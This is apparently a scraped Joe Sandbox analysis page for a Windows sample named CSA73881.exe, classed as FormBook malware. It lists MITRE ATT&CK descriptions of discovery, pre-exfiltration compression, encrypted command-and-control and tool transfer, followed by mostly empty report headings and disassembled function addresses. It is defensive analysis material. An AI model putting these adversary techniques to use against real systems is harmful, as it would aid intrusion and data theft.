Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CSA73881.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSA73881.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
CSA73881.exe

Function 0325A9E8 Relevance: 2.0, APIs: 1, Instructions: 513
COMMON

Function 0325F12C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 0325F138 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 032558B8 Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 03255930 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 0325B280 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 0325B288 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 03258AAC Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 0325F780 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Function 0325F788 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Function 0645A4B1 Relevance: 1.4, Strings: 1, Instructions: 175
COMMON